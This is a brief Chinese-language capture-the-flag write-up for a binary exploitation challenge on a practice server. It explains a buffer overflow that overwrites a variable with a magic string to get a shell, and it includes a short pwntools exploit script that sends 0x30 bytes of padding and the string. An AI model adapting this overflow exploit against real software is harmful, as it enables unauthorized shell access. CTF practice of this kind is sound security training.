查看保护
有个溢出,可以覆盖掉v5。v5等于n0t_r3@11y_f1@g即可get_shell。所以溢出改v5就行。
from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 26447) else: r = process(file_name) elf = ELF(file_name) def dbg(): gdb.attach(r) p1 = b'a' * 0x30 + b'n0t_r3@11y_f1@g' r.sendline(p1) r.interactive()